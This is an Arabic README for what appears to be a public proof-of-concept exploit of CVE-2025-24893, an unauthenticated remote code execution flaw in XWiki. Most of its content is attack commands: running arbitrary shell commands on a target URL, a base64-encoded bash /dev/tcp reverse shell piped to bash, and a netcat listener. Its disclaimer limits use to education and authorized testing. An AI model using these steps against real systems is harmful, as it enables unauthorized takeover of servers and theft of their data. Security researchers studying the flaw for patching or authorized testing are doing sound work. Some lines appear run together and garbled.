
استغلال إثبات المفهوم لـ CVE-2025-24893 يتيح تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه على XWiki مع أوامر قشرة عشوائية وحقن قشرة عكسية عبر Python.
استغلال محدّث لإثبات المفهوم (PoC) لثغرة CVE-2025-24893، وهي ثغرة RCE حرجة بدون مصادقة في XWiki. يحسّن هذا الإصدار الإصدار الأصلي من خلال السماح بتنفيذ أوامر شل تعسفية وحقن شل عكسي نظيف.
بواسطة: HexHunter404
هذا الكود مقدم لأغراض التعليم واختبار الاختراق المصرح به فقط.
لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
bash -c '<command>'/xwiki ويتجنب حلقات إعادة التوجيهpython3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
. قم بترميز الشل العكسي باستخدام base64
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
. أرسله باستخدام الـ PoC
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
. قم بإعداد المستمع الخاص بك
nc -lvnp 4444
إذا نجحت، ستحصل على شل.